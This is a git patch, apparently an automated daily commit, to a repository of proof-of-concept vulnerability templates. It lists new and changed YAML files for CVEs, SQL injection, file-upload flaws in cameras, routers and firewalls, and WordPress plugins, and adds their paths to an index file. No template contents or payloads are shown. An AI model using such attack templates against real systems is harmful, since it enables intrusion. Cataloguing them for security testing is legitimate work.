From eb5f6001363cdf512089154391a7330a13eb461d Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sat, 24 Aug 2024 12:35:08 +0000 Subject: [PATCH] 20240824 --- date.txt | 2 +- poc.txt | 120 ++++++++++++++++++ poc/auth/BlindSQLAuth.yaml | 66 +++++----- poc/auth/login-as-users.yaml | 59 +++++++++ .../django-debug-exposure-csrf.yaml | 18 +-- ...0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml | 59 +++++++++ ...6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml | 59 +++++++++ ...2254-fff7de08f6116735e0400b319113ddc3.yaml | 59 +++++++++ poc/cve/CVE-2024-39666.yaml | 59 +++++++++ ...4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml | 59 +++++++++ poc/cve/CVE-2024-43238.yaml | 59 +++++++++ poc/cve/CVE-2024-43239.yaml | 59 +++++++++ poc/cve/CVE-2024-43240.yaml | 59 +++++++++ poc/cve/CVE-2024-43241.yaml | 59 +++++++++ poc/cve/CVE-2024-43242.yaml | 59 +++++++++ poc/cve/CVE-2024-43244.yaml | 59 +++++++++ poc/cve/CVE-2024-43245.yaml | 59 +++++++++ poc/cve/CVE-2024-43246.yaml | 59 +++++++++ poc/cve/CVE-2024-43247.yaml | 59 +++++++++ poc/cve/CVE-2024-43248.yaml | 59 +++++++++ poc/cve/CVE-2024-43249.yaml | 59 +++++++++ poc/cve/CVE-2024-43250.yaml | 59 +++++++++ poc/cve/CVE-2024-43251.yaml | 59 +++++++++ poc/cve/CVE-2024-43252.yaml | 59 +++++++++ poc/cve/CVE-2024-43253.yaml | 59 +++++++++ poc/cve/CVE-2024-43254.yaml | 59 +++++++++ poc/cve/CVE-2024-43255.yaml | 59 +++++++++ poc/cve/CVE-2024-43256.yaml | 59 +++++++++ poc/cve/CVE-2024-43257.yaml | 59 +++++++++ poc/cve/CVE-2024-43258.yaml | 59 +++++++++ poc/cve/CVE-2024-43259.yaml | 59 +++++++++ poc/cve/CVE-2024-43260.yaml | 59 +++++++++ poc/cve/CVE-2024-43261.yaml | 59 +++++++++ poc/cve/CVE-2024-43262.yaml | 59 +++++++++ poc/cve/CVE-2024-43263.yaml | 59 +++++++++ poc/cve/CVE-2024-43264.yaml | 59 +++++++++ poc/cve/CVE-2024-43265.yaml | 59 +++++++++ poc/cve/CVE-2024-43266.yaml | 59 +++++++++ poc/cve/CVE-2024-43267.yaml | 59 +++++++++ poc/cve/CVE-2024-43268.yaml | 59 +++++++++ poc/cve/CVE-2024-43269.yaml | 59 +++++++++ poc/cve/CVE-2024-43270.yaml | 59 +++++++++ poc/cve/CVE-2024-43271.yaml | 59 +++++++++ 
poc/cve/CVE-2024-43272.yaml | 59 +++++++++ poc/cve/CVE-2024-43273.yaml | 59 +++++++++ poc/cve/CVE-2024-43276.yaml | 59 +++++++++ poc/cve/CVE-2024-43278.yaml | 59 +++++++++ poc/cve/CVE-2024-43279.yaml | 59 +++++++++ poc/cve/CVE-2024-43280.yaml | 59 +++++++++ poc/cve/CVE-2024-43281.yaml | 59 +++++++++ poc/cve/CVE-2024-43282.yaml | 59 +++++++++ poc/cve/CVE-2024-43283.yaml | 59 +++++++++ poc/cve/CVE-2024-43284.yaml | 59 +++++++++ poc/cve/CVE-2024-43288.yaml | 59 +++++++++ poc/cve/CVE-2024-43289.yaml | 59 +++++++++ poc/cve/CVE-2024-43292.yaml | 59 +++++++++ poc/cve/CVE-2024-43296.yaml | 59 +++++++++ poc/cve/CVE-2024-43303.yaml | 59 +++++++++ poc/cve/CVE-2024-43306.yaml | 59 +++++++++ poc/cve/CVE-2024-43307.yaml | 59 +++++++++ poc/cve/CVE-2024-43308.yaml | 59 +++++++++ poc/cve/CVE-2024-43309.yaml | 59 +++++++++ poc/cve/CVE-2024-43311.yaml | 59 +++++++++ poc/cve/CVE-2024-43313.yaml | 59 +++++++++ poc/cve/CVE-2024-43318.yaml | 59 +++++++++ poc/cve/CVE-2024-43319.yaml | 59 +++++++++ poc/cve/CVE-2024-43321.yaml | 59 +++++++++ poc/cve/CVE-2024-43322.yaml | 59 +++++++++ poc/cve/CVE-2024-43327.yaml | 59 +++++++++ poc/cve/CVE-2024-43328.yaml | 59 +++++++++ poc/cve/CVE-2024-43335.yaml | 59 +++++++++ poc/cve/CVE-2024-43342.yaml | 59 +++++++++ poc/cve/CVE-2024-43344.yaml | 59 +++++++++ poc/cve/CVE-2024-43345.yaml | 59 +++++++++ poc/cve/CVE-2024-43346.yaml | 59 +++++++++ poc/cve/CVE-2024-43348.yaml | 59 +++++++++ poc/cve/CVE-2024-43350.yaml | 59 +++++++++ poc/cve/CVE-2024-43352.yaml | 59 +++++++++ poc/cve/CVE-2024-43353.yaml | 59 +++++++++ poc/cve/CVE-2024-43354.yaml | 59 +++++++++ ...4359-739b7c6397af07930a602ed827679ba1.yaml | 59 +++++++++ poc/cve/CVE-2024-5502.yaml | 59 +++++++++ ...6493-8ce30d589b40d67eb51efe70935d8bd9.yaml | 59 +++++++++ ...6499-506582290ab27969bbad70e6796d3810.yaml | 59 +++++++++ ...6617-861b78cb0bd74ebded540a2ef2369b65.yaml | 59 +++++++++ ...6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml | 59 +++++++++ ...6665-8c1223ca753362f23c9223b5d83c7625.yaml | 59 +++++++++ 
...6667-4b06082c59fafdba7199d79388d0eff6.yaml | 59 +++++++++ poc/cve/CVE-2024-7258.yaml | 59 +++++++++ ...7351-93a2178394f4d78fbcc5b86f7c46b250.yaml | 59 +++++++++ poc/cve/CVE-2024-7559.yaml | 59 +++++++++ ...7568-03c9c97fbcce1159bd078f05cbf27da7.yaml | 59 +++++++++ ...7651-7d4af77ba7202b412fee68fa25bbbec8.yaml | 59 +++++++++ ...7656-cc628b96623048172302ddea18aada71.yaml | 59 +++++++++ ...8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml | 59 +++++++++ poc/cve/cve-2001-1473.yaml | 8 +- poc/cve/cve-2008-5587.yaml | 19 ++- poc/cve/cve-2009-1151.yaml | 22 ++-- poc/cve/cve-2018-15473.yaml | 14 +- poc/cve/cve-2018-15535.yaml | 21 ++- poc/cve/cve-2020-15227.yaml | 32 +++-- ...ator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml | 59 +++++++++ ...code-08ebf57284e81768e19b2643c32c71af.yaml | 59 +++++++++ ...code-afbd01983360416a12cb28f807e89a8d.yaml | 59 +++++++++ .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++--- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++----- poc/other/Dahua_getUserInfoByUserName.yaml | 18 ++- poc/other/bigip.yaml | 65 ++++------ poc/other/bitformpro.yaml | 59 +++++++++ poc/other/compute-links.yaml | 59 +++++++++ ...inks-44331c84afd644601efc55a9e5863103.yaml | 59 +++++++++ ...spot-269eebf1ba30b97f68098501ab57b8df.yaml | 59 +++++++++ poc/other/display-a-meta-field-as-block.yaml | 59 +++++++++ poc/other/givingpress-lite.yaml | 59 +++++++++ poc/other/gutentor.yaml | 59 +++++++++ poc/other/hr-management.yaml | 59 +++++++++ ...sion-76fdeef266854108ceda8d0e46474378.yaml | 59 +++++++++ ...sion-7b8181a7be59fef3323111e90fb3e895.yaml | 59 +++++++++ ...cket-213e255d0f7bbab0012e0bbbd474a0f3.yaml | 59 +++++++++ ...tons-64ecf3c81675d9335f44728b57cd5ada.yaml | 59 +++++++++ poc/other/purity-of-soul.yaml | 59 +++++++++ poc/other/responsive-block-editor-addons.yaml | 59 +++++++++ ...ntor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml | 59 +++++++++ ...oard-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml | 59 +++++++++ ...ator-b6189df65fa837d8ca49f92847869143.yaml | 59 +++++++++ 
poc/other/visual-composer-starter.yaml | 59 +++++++++ poc/other/whmpress.yaml | 59 +++++++++ ...order-export-and-more-for-woocommerce.yaml | 59 +++++++++ .../yonyou-nc-cloud-jsinvoke-rce.yaml | 37 +++--- poc/sql/BlindSQLAuth.yaml | 66 +++++----- ...0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml | 59 +++++++++ ...6667-4b06082c59fafdba7199d79388d0eff6.yaml | 59 +++++++++ ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- ...cket-e74990277ea37a8d6eb0543a824bddb7.yaml | 59 +++++++++ poc/sql_injection/BlindSQLAuth.yaml | 66 +++++----- ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 30 ++--- poc/upload/Dahua_Video_FileUpload.yaml | 42 ++++-- .../Hikvision_iVMS-8700_upload_action.yaml | 45 ++----- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 +++++++--- poc/upload/Ruijie_NBR_Router_fileupload.yaml | 30 +++-- ...ecology_E-Office_Uploadify_FileUpload.yaml | 51 +++++--- .../leopard-wordpress-offload-media.yaml | 59 +++++++++ poc/wordpress/wp-travel-blocks.yaml | 59 +++++++++ poc/wordpress/wptelegram-widget.yaml | 59 +++++++++ 144 files changed, 7605 insertions(+), 424 deletions(-) create mode 100644 poc/auth/login-as-users.yaml create mode 100644 poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml create mode 100644 poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml create mode 100644 poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml create mode 100644 poc/cve/CVE-2024-39666.yaml create mode 100644 poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml create mode 100644 poc/cve/CVE-2024-43238.yaml create mode 100644 poc/cve/CVE-2024-43239.yaml create mode 100644 poc/cve/CVE-2024-43240.yaml create mode 100644 poc/cve/CVE-2024-43241.yaml create mode 100644 poc/cve/CVE-2024-43242.yaml create mode 100644 poc/cve/CVE-2024-43244.yaml create mode 100644 poc/cve/CVE-2024-43245.yaml create mode 100644 poc/cve/CVE-2024-43246.yaml create mode 100644 poc/cve/CVE-2024-43247.yaml create mode 100644 poc/cve/CVE-2024-43248.yaml create mode 100644 
poc/cve/CVE-2024-43249.yaml create mode 100644 poc/cve/CVE-2024-43250.yaml create mode 100644 poc/cve/CVE-2024-43251.yaml create mode 100644 poc/cve/CVE-2024-43252.yaml create mode 100644 poc/cve/CVE-2024-43253.yaml create mode 100644 poc/cve/CVE-2024-43254.yaml create mode 100644 poc/cve/CVE-2024-43255.yaml create mode 100644 poc/cve/CVE-2024-43256.yaml create mode 100644 poc/cve/CVE-2024-43257.yaml create mode 100644 poc/cve/CVE-2024-43258.yaml create mode 100644 poc/cve/CVE-2024-43259.yaml create mode 100644 poc/cve/CVE-2024-43260.yaml create mode 100644 poc/cve/CVE-2024-43261.yaml create mode 100644 poc/cve/CVE-2024-43262.yaml create mode 100644 poc/cve/CVE-2024-43263.yaml create mode 100644 poc/cve/CVE-2024-43264.yaml create mode 100644 poc/cve/CVE-2024-43265.yaml create mode 100644 poc/cve/CVE-2024-43266.yaml create mode 100644 poc/cve/CVE-2024-43267.yaml create mode 100644 poc/cve/CVE-2024-43268.yaml create mode 100644 poc/cve/CVE-2024-43269.yaml create mode 100644 poc/cve/CVE-2024-43270.yaml create mode 100644 poc/cve/CVE-2024-43271.yaml create mode 100644 poc/cve/CVE-2024-43272.yaml create mode 100644 poc/cve/CVE-2024-43273.yaml create mode 100644 poc/cve/CVE-2024-43276.yaml create mode 100644 poc/cve/CVE-2024-43278.yaml create mode 100644 poc/cve/CVE-2024-43279.yaml create mode 100644 poc/cve/CVE-2024-43280.yaml create mode 100644 poc/cve/CVE-2024-43281.yaml create mode 100644 poc/cve/CVE-2024-43282.yaml create mode 100644 poc/cve/CVE-2024-43283.yaml create mode 100644 poc/cve/CVE-2024-43284.yaml create mode 100644 poc/cve/CVE-2024-43288.yaml create mode 100644 poc/cve/CVE-2024-43289.yaml create mode 100644 poc/cve/CVE-2024-43292.yaml create mode 100644 poc/cve/CVE-2024-43296.yaml create mode 100644 poc/cve/CVE-2024-43303.yaml create mode 100644 poc/cve/CVE-2024-43306.yaml create mode 100644 poc/cve/CVE-2024-43307.yaml create mode 100644 poc/cve/CVE-2024-43308.yaml create mode 100644 poc/cve/CVE-2024-43309.yaml create mode 100644 
poc/cve/CVE-2024-43311.yaml create mode 100644 poc/cve/CVE-2024-43313.yaml create mode 100644 poc/cve/CVE-2024-43318.yaml create mode 100644 poc/cve/CVE-2024-43319.yaml create mode 100644 poc/cve/CVE-2024-43321.yaml create mode 100644 poc/cve/CVE-2024-43322.yaml create mode 100644 poc/cve/CVE-2024-43327.yaml create mode 100644 poc/cve/CVE-2024-43328.yaml create mode 100644 poc/cve/CVE-2024-43335.yaml create mode 100644 poc/cve/CVE-2024-43342.yaml create mode 100644 poc/cve/CVE-2024-43344.yaml create mode 100644 poc/cve/CVE-2024-43345.yaml create mode 100644 poc/cve/CVE-2024-43346.yaml create mode 100644 poc/cve/CVE-2024-43348.yaml create mode 100644 poc/cve/CVE-2024-43350.yaml create mode 100644 poc/cve/CVE-2024-43352.yaml create mode 100644 poc/cve/CVE-2024-43353.yaml create mode 100644 poc/cve/CVE-2024-43354.yaml create mode 100644 poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml create mode 100644 poc/cve/CVE-2024-5502.yaml create mode 100644 poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml create mode 100644 poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml create mode 100644 poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml create mode 100644 poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml create mode 100644 poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml create mode 100644 poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml create mode 100644 poc/cve/CVE-2024-7258.yaml create mode 100644 poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml create mode 100644 poc/cve/CVE-2024-7559.yaml create mode 100644 poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml create mode 100644 poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml create mode 100644 poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml create mode 100644 poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml create mode 100644 poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml 
create mode 100644 poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml create mode 100644 poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml create mode 100644 poc/other/bitformpro.yaml create mode 100644 poc/other/compute-links.yaml create mode 100644 poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml create mode 100644 poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml create mode 100644 poc/other/display-a-meta-field-as-block.yaml create mode 100644 poc/other/givingpress-lite.yaml create mode 100644 poc/other/gutentor.yaml create mode 100644 poc/other/hr-management.yaml create mode 100644 poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml create mode 100644 poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml create mode 100644 poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml create mode 100644 poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml create mode 100644 poc/other/purity-of-soul.yaml create mode 100644 poc/other/responsive-block-editor-addons.yaml create mode 100644 poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml create mode 100644 poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml create mode 100644 poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml create mode 100644 poc/other/visual-composer-starter.yaml create mode 100644 poc/other/whmpress.yaml create mode 100644 poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml create mode 100644 poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml create mode 100644 poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml create mode 100644 poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml create mode 100644 poc/wordpress/leopard-wordpress-offload-media.yaml create mode 100644 poc/wordpress/wp-travel-blocks.yaml create mode 100644 poc/wordpress/wptelegram-widget.yaml 
diff --git a/date.txt b/date.txt
index cd765ecede..8df515083d 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240823
+20240824
diff --git a/poc.txt b/poc.txt
index 4b5c09733f..24f176830a 100644
--- a/poc.txt
+++ b/poc.txt
@@ -3664,6 +3664,7 @@
 ./poc/auth/login-as-customer-or-user-plugin.yaml
 ./poc/auth/login-as-customer-or-user.yaml
 ./poc/auth/login-as-users-0e39f1f2ee0d17c654853b5f04aceb5b.yaml
+./poc/auth/login-as-users.yaml
 ./poc/auth/login-attempts-limit-wp-a27b928af3555fe96c9110a0c596251e.yaml
 ./poc/auth/login-attempts-limit-wp-a3d4d3eee498ab5be06833bab20d1678.yaml
 ./poc/auth/login-attempts-limit-wp.yaml
@@ -23801,6 +23802,7 @@
 ./poc/cve/CVE-2023-0911.yaml
 ./poc/cve/CVE-2023-0924-5f6349523fa3681f3fb3dddd26ea40cb.yaml
 ./poc/cve/CVE-2023-0924.yaml
+./poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml
 ./poc/cve/CVE-2023-0937-710621abe5c27a3f4d488a85b84e167f.yaml
 ./poc/cve/CVE-2023-0937.yaml
 ./poc/cve/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml
@@ -32362,6 +32364,7 @@
 ./poc/cve/CVE-2023-6985.yaml
 ./poc/cve/CVE-2023-6986-40ce27a126a874a6f061b95c0f565f63.yaml
 ./poc/cve/CVE-2023-6986.yaml
+./poc/cve/CVE-2023-6987-c1c87c85e30a10fc9ff9a903c209fbf6.yaml
 ./poc/cve/CVE-2023-6988-159f07c88d3476750318c076d61454ef.yaml
 ./poc/cve/CVE-2023-6988.yaml
 ./poc/cve/CVE-2023-6989-f3e101de1aabc79baa4bde571ba04314.yaml
@@ -34361,6 +34364,7 @@
 ./poc/cve/CVE-2024-2253-df0681714bb2dac738636b14f0dd1322.yaml
 ./poc/cve/CVE-2024-2253-e80d4914f56d0bcf3f9f3038bce09c0d.yaml
 ./poc/cve/CVE-2024-2253.yaml
+./poc/cve/CVE-2024-2254-fff7de08f6116735e0400b319113ddc3.yaml
 ./poc/cve/CVE-2024-2255-c91737673f0c0121f5550bad7a472ece.yaml
 ./poc/cve/CVE-2024-2255.yaml
 ./poc/cve/CVE-2024-2256-baa716bf2c82d44f12eb5944a7db627c.yaml
@@ -39641,6 +39645,7 @@ ./poc/cve/CVE-2024-39665-eb86ffef2c0d7c6205176cce262c3985.yaml ./poc/cve/CVE-2024-39665.yaml ./poc/cve/CVE-2024-39666-0b1e987c7e40ab204e56556fca06f4e7.yaml +./poc/cve/CVE-2024-39666.yaml ./poc/cve/CVE-2024-39668-a8fc61243890a8b4d5c1db69e4467701.yaml ./poc/cve/CVE-2024-39668.yaml ./poc/cve/CVE-2024-39678-70f27dc1298f6ae4ac79bb3c3bf23903.yaml @@ -39759,6 +39764,7 @@ ./poc/cve/CVE-2024-4095-d8fdc7f014f7dcfae7c33bd9cedc7fbf.yaml ./poc/cve/CVE-2024-4095.yaml ./poc/cve/CVE-2024-4096-9e17fda2ec5cfda56d2198b430e85695.yaml +./poc/cve/CVE-2024-4096-f7fc8238f9059dfbea1c3f48f5cc8e2e.yaml ./poc/cve/CVE-2024-4096.yaml ./poc/cve/CVE-2024-4097-8ff9159d33c05e91ff51a5a3539d426a.yaml ./poc/cve/CVE-2024-4097.yaml 
@@ -40066,58 +40072,103 @@ ./poc/cve/CVE-2024-43236-0aa244f387067d6fa1a2f360a122d1ca.yaml ./poc/cve/CVE-2024-43236.yaml ./poc/cve/CVE-2024-43238-1dfbdedd48f79e362612fd3d52464156.yaml +./poc/cve/CVE-2024-43238.yaml ./poc/cve/CVE-2024-43239-5acc6b9bdc039d71efd1b6883dc7079d.yaml +./poc/cve/CVE-2024-43239.yaml ./poc/cve/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml ./poc/cve/CVE-2024-4324.yaml ./poc/cve/CVE-2024-43240-602dd094f3b3105ea72425933e143ccf.yaml +./poc/cve/CVE-2024-43240.yaml ./poc/cve/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml +./poc/cve/CVE-2024-43241.yaml ./poc/cve/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml +./poc/cve/CVE-2024-43242.yaml ./poc/cve/CVE-2024-43244-939e704d270328b1ff062eb9844d75b2.yaml +./poc/cve/CVE-2024-43244.yaml ./poc/cve/CVE-2024-43245-3fc6d2c3f5750fb0be80ffc0c8d01f2d.yaml +./poc/cve/CVE-2024-43245.yaml ./poc/cve/CVE-2024-43246-e4931f33e22f3b0d81b8bf3466c11868.yaml +./poc/cve/CVE-2024-43246.yaml ./poc/cve/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml +./poc/cve/CVE-2024-43247.yaml ./poc/cve/CVE-2024-43248-02766ce7753cfbf027f4bd7e7c8beefa.yaml +./poc/cve/CVE-2024-43248.yaml ./poc/cve/CVE-2024-43249-9332e35d2ca00b85ffd1d6c5886e63ec.yaml +./poc/cve/CVE-2024-43249.yaml ./poc/cve/CVE-2024-43250-9c99a7674eaede7a5abac359a81cf9bb.yaml +./poc/cve/CVE-2024-43250.yaml ./poc/cve/CVE-2024-43251-bdf342d7649c7626a07f0ede9a708ec4.yaml +./poc/cve/CVE-2024-43251.yaml ./poc/cve/CVE-2024-43252-bc3586df4bd9df275d63c3b38b4b7691.yaml +./poc/cve/CVE-2024-43252.yaml ./poc/cve/CVE-2024-43253-f0a28b89948b7ce1a9e3b142fc5b96af.yaml +./poc/cve/CVE-2024-43253.yaml ./poc/cve/CVE-2024-43254-45b63d56497d30988092c35280a0f346.yaml +./poc/cve/CVE-2024-43254.yaml ./poc/cve/CVE-2024-43255-c5e379d221966e401191b74f67ed5c1d.yaml +./poc/cve/CVE-2024-43255.yaml ./poc/cve/CVE-2024-43256-866dd2f4b3efe33271abaa94fe764d76.yaml +./poc/cve/CVE-2024-43256.yaml ./poc/cve/CVE-2024-43257-2f7a51a2e99eeed0090ae78fd8a6d6c1.yaml +./poc/cve/CVE-2024-43257.yaml 
./poc/cve/CVE-2024-43258-f0ba53155846a7fcd61cd515004d3b42.yaml +./poc/cve/CVE-2024-43258.yaml ./poc/cve/CVE-2024-43259-72e8e395070ef39fd958898991e5b6b6.yaml +./poc/cve/CVE-2024-43259.yaml ./poc/cve/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml +./poc/cve/CVE-2024-43260.yaml ./poc/cve/CVE-2024-43261-678706860c4e57cd059d9f119dea313a.yaml +./poc/cve/CVE-2024-43261.yaml ./poc/cve/CVE-2024-43262-1a861225d324308d9705bd093a6382ee.yaml +./poc/cve/CVE-2024-43262.yaml ./poc/cve/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml +./poc/cve/CVE-2024-43263.yaml ./poc/cve/CVE-2024-43264-ac09743b47220dfa62720b1de75e8fc4.yaml +./poc/cve/CVE-2024-43264.yaml ./poc/cve/CVE-2024-43265-8234cc6f4ac66f2b070661ce02359592.yaml +./poc/cve/CVE-2024-43265.yaml ./poc/cve/CVE-2024-43266-c9b30abb24b2129a7fa8624964d4d1b7.yaml +./poc/cve/CVE-2024-43266.yaml ./poc/cve/CVE-2024-43267-7f3c630c635d1a10a9e449566a113d16.yaml +./poc/cve/CVE-2024-43267.yaml ./poc/cve/CVE-2024-43268-eb378d1bac11bc8d0bff41eae43c13fe.yaml +./poc/cve/CVE-2024-43268.yaml ./poc/cve/CVE-2024-43269-0c1f242de365e56e055b30f6f86d4ff6.yaml +./poc/cve/CVE-2024-43269.yaml ./poc/cve/CVE-2024-43270-00633de45e44065b1555bce09f62fb9d.yaml +./poc/cve/CVE-2024-43270.yaml ./poc/cve/CVE-2024-43271-b31214f9813d473f3cd67a61f9d552af.yaml +./poc/cve/CVE-2024-43271.yaml ./poc/cve/CVE-2024-43272-4bb700a4fd663240eafaf4808a8dc083.yaml +./poc/cve/CVE-2024-43272.yaml ./poc/cve/CVE-2024-43273-731e5bc58cf2a73042628e403eeeb161.yaml +./poc/cve/CVE-2024-43273.yaml ./poc/cve/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml +./poc/cve/CVE-2024-43276.yaml ./poc/cve/CVE-2024-43277-6b4940f2eac79c6e5fa7f9ba0cc0604e.yaml ./poc/cve/CVE-2024-43277.yaml ./poc/cve/CVE-2024-43278-fd5de4ff2b6a98fd4fced1b05d5ba695.yaml +./poc/cve/CVE-2024-43278.yaml ./poc/cve/CVE-2024-43279-4856fcf32dd027479e787b6af4d881c8.yaml +./poc/cve/CVE-2024-43279.yaml ./poc/cve/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml +./poc/cve/CVE-2024-43280.yaml 
./poc/cve/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml +./poc/cve/CVE-2024-43281.yaml ./poc/cve/CVE-2024-43282-4139e9028e5e4aaf19dfb7d072072d16.yaml +./poc/cve/CVE-2024-43282.yaml ./poc/cve/CVE-2024-43283-48bd98c02d59c632156d003781e3c65c.yaml +./poc/cve/CVE-2024-43283.yaml ./poc/cve/CVE-2024-43284-8f3b74619f71500671f7b82070889832.yaml +./poc/cve/CVE-2024-43284.yaml ./poc/cve/CVE-2024-43285-2259cac19eda110255245b91d280697e.yaml ./poc/cve/CVE-2024-43285.yaml ./poc/cve/CVE-2024-43287-b8c9808356b0d4ca60466a01cf2f6ffc.yaml ./poc/cve/CVE-2024-43287.yaml ./poc/cve/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml +./poc/cve/CVE-2024-43288.yaml ./poc/cve/CVE-2024-43289-fde4ffac9ff58bcd12d9665650ffc6f2.yaml +./poc/cve/CVE-2024-43289.yaml ./poc/cve/CVE-2024-4329-0b2116d78c4eba82eeda084c20215115.yaml ./poc/cve/CVE-2024-4329.yaml ./poc/cve/CVE-2024-43290-6aaddd95421bac5d3791131102bf0d20.yaml @@ -40125,6 +40176,7 @@ ./poc/cve/CVE-2024-43291-dabd8edbe180773a366911d00bf7b3d8.yaml ./poc/cve/CVE-2024-43291.yaml ./poc/cve/CVE-2024-43292-b35a55b76b75876dc21a9c95e4bab296.yaml +./poc/cve/CVE-2024-43292.yaml ./poc/cve/CVE-2024-43293-4ded08b075aff72e2714da1bf0758502.yaml ./poc/cve/CVE-2024-43293.yaml ./poc/cve/CVE-2024-43294-74cdcbe12dafdf14c55db65337423666.yaml @@ -40132,6 +40184,7 @@ ./poc/cve/CVE-2024-43295-e48e7df4f337c104fbb6960b7a073918.yaml ./poc/cve/CVE-2024-43295.yaml ./poc/cve/CVE-2024-43296-0b5d50fa95a43be7a612dc20668129af.yaml +./poc/cve/CVE-2024-43296.yaml ./poc/cve/CVE-2024-43297-d97e1b82684ec5fda05751316b5bf585.yaml ./poc/cve/CVE-2024-43297.yaml ./poc/cve/CVE-2024-43298-6c52a4ccd32e47bf034fb72c4a4cdca9.yaml 
@@ -40143,20 +40196,27 @@ ./poc/cve/CVE-2024-43302-7eb579c0aaaf235ed55e89a50bb63283.yaml ./poc/cve/CVE-2024-43302.yaml ./poc/cve/CVE-2024-43303-01fb8c2bb8cae6a750e6ca67b3ff8b01.yaml +./poc/cve/CVE-2024-43303.yaml ./poc/cve/CVE-2024-43304-195bc96c646d6ca6175e1ee2e543c7e0.yaml ./poc/cve/CVE-2024-43304.yaml ./poc/cve/CVE-2024-43305-1d51a608cf1e6b149a393660c5257486.yaml ./poc/cve/CVE-2024-43305.yaml ./poc/cve/CVE-2024-43306-f131b00187e803d708a0f231c364afbd.yaml +./poc/cve/CVE-2024-43306.yaml ./poc/cve/CVE-2024-43307-6e8a4afc370a9e3e066e1d471010cbb3.yaml +./poc/cve/CVE-2024-43307.yaml ./poc/cve/CVE-2024-43308-192b2df1f5f4f85d5f8625397708ef74.yaml +./poc/cve/CVE-2024-43308.yaml ./poc/cve/CVE-2024-43309-ef7ed8aea74d6ec75a483884f5e9e3b2.yaml +./poc/cve/CVE-2024-43309.yaml ./poc/cve/CVE-2024-43310-f45a761baa6c56237775fa475b020a07.yaml ./poc/cve/CVE-2024-43310.yaml ./poc/cve/CVE-2024-43311-e7d0427a9d0846d998d7b31c89a0ded9.yaml +./poc/cve/CVE-2024-43311.yaml ./poc/cve/CVE-2024-43312-a955ef755ede1aff915d714d801fd4f2.yaml ./poc/cve/CVE-2024-43312.yaml ./poc/cve/CVE-2024-43313-5cfc463b9da71902790bb449cb8a197f.yaml +./poc/cve/CVE-2024-43313.yaml ./poc/cve/CVE-2024-43314-c4f69d44bf9c33670d3edf1035d16ec7.yaml ./poc/cve/CVE-2024-43314.yaml ./poc/cve/CVE-2024-43315-22f15f2b106abaa3fabeaf39acb88e9f.yaml 
